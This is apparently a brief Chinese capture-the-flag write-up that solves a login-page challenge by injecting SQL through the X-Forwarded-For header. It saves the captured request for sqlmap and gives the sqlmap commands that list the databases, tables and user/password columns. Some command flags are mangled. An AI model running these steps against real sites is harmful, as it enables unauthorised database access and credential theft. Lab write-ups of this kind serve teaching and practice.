打开地址

是一个登录页面

代理抓包

题目为X-Forwarded-For：存在注入漏洞，抓包结果没有X-Forwarded-For：
添加X-Forwarded-For之后，复制保存在sqlmap下txt文件。X-Forwarded-For: (加 告诉sqlmap此处存在漏洞)

保存名字为xff.txt文件之后。

sqlmap

爆数据库

python sqlmap.py -r xff.txt —dbs —batch(默认选择yes)

数据库名称为 webcalendar

爆表名
python sqlmap.py -r xff.txt -D webcalendar -tables —batch(默认选择yes)

得到表名user;logins。

爆字段名
python sqlmap.py -r xff.txt -D webcalendar -T user —columns —batch

得到字段名id;password;username。

登录

获取成功！！